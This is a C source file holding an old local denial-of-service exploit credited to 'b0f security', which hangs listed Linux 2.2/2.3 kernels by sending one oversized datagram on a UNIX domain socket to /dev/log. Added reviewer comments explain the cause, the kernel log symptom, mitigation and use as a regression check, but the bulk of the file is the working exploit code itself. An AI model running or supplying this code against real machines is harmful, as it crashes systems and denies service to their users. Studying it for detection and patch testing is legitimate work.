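/* [http://b0f.morphed.net] - eth0 */
/*
 * Vulnerable (as listed by the original advisory):
 *   Linux 2.2.12
 *   Linux 2.2.13
 *   Linux 2.2.14
 *   Linux 2.3.99-pre2
 *
 * The following exploit code will hang any Linux machine on various Pentium
 * platforms. Note that this does not require any special privileges, and any
 * user can compile and run it, so watch out kiddies...
 *
 * The send system call immediately puts the kernel in a loop spewing
 *
 *     kmalloc: Size (131076) too large
 *
 * forever (or until you hit the reset button).
 *
 * Apparently UNIX domain sockets are ignoring the
 * /proc/sys/net/core/wmem_max parameter, despite the documentation to the
 * contrary.
 *
 * [code provided by eth0 from b0f security]
 * [information provided by Jay Fenlason]
 * [http://b0f.morphed.net] [buffer0verfl0w security]
 */

/*
 * Reviewer notes (defensive reading of the advisory above):
 *  - Class: local denial of service; the advisory states no privileges are
 *    needed, so any shell account on a listed kernel is enough.
 *  - Cause, as the advisory describes it: the size of a datagram sent on an
 *    AF_UNIX socket is not bounded by wmem_max, so a single oversized send
 *    reaches the kernel allocator.
 *  - Detection: the repeating "kmalloc: Size (131076) too large" kernel
 *    message quoted above is the symptom to look for in console/kernel logs.
 *  - Mitigation: move off the kernel versions listed above and confirm the
 *    replacement kernel survives this send. The exit status below makes the
 *    program usable as a regression check: it returns 0 when the send was
 *    accepted and 1 (with the errno text) when a call was refused.
 *
 * The header names after "#include" were lost when this page was extracted;
 * the ones below are what the identifiers used in this file require.
 */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>

/* 128 KiB payload buffer, kept at file scope so it is not on the stack. */
char buf[128 * 1024];

/*
 * Sends one datagram of sizeof(buf) - 5 = 131067 bytes to the UNIX domain
 * socket at /dev/log.
 *
 * Returns 0 if both socket() and sendto() succeed, 1 if either fails (the
 * failing call and errno text are printed to stderr). argc/argv are unused.
 */
int main ( int argc, char **argv )
{
    struct sockaddr SyslogAddr;
    int LogFile;
    int bufsize = sizeof(buf) - 5;
    int i;

    (void)argc;
    (void)argv;

    /* Fill with a repeating run of the 95 printable ASCII characters
     * (' ' .. '~'); the content itself is irrelevant, only the length is. */
    for ( i = 0; i < bufsize; i++ )
        buf[i] = ' ' + (i % 95);
    buf[i] = '\0';

    /* Generic sockaddr used for an AF_UNIX path: "/dev/log" is shorter than
     * sa_data, so strncpy() also zero-fills the rest of the field. */
    SyslogAddr.sa_family = AF_UNIX;
    strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );

    LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
    if ( LogFile < 0 ) {
        /* Without this check a failed socket() would pass -1 to sendto(). */
        perror ( "socket" );
        return 1;
    }

    /* The single oversized send the advisory is about. Report the outcome
     * instead of discarding it, so a run on a kernel that handles the
     * request correctly leaves a visible result. */
    if ( sendto ( LogFile, buf, bufsize, 0, &SyslogAddr,
                  sizeof(SyslogAddr) ) < 0 ) {
        perror ( "sendto" );
        return 1;
    }

    return 0;
}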